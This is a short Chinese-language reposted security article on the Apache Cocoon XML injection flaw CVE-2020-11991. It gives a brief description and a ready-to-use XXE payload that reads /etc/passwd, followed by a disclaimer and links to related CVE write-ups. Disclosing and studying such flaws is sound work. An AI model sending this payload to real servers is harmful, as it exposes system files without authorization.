Apache Cocoon XML注入[CVE-2020-11991]

本文轉載自查看原文 2020-09-14 11:21 747 Web安全/ 技巧

請遵守網絡安全法！！！本文僅供學習交流使用！用於任何非授權滲透、非法目的攻擊、從事非法活動均與筆者無關！讀者自行承擔其惡果！

漏洞簡介

程序使用了StreamGenerator這個方法時,解析從外部請求的xml數據包未做相關的限制,惡意用戶就可以構造任意的xml表達式,使服務器解析達到XML注入的安全問題。

利用姿勢

<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
<userInfo>
<firstName>John</firstName> 
<lastName>&ent;</lastName>
</userInfo>

來源

http://mail-archives.apache.org/mod_mbox/cocoon-users/202009.mbox/author

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 Apache Cocoon XML注入 [CVE-2020-11991] Apache SkyWalking SQL注入漏洞復現分析 (CVE-2020-9483) CVE-2020-9496 apache ofbiz xml-rpc反序列化漏洞分析 Apache Flink CVE-2020-17518 & CVE-2020-17519 Apache #Tomcat CVE-2020-9484 OpenSSH的scp命令注入漏洞(CVE-2020-15778) CVE-2020-15778 Openssh命令注入漏洞復現 OpenSSH 命令注入漏洞（CVE-2020-15778） OpenSSH命令注入漏洞復現(CVE-2020-15778) OpenSSH 命令注入漏洞(CVE-2020-15778)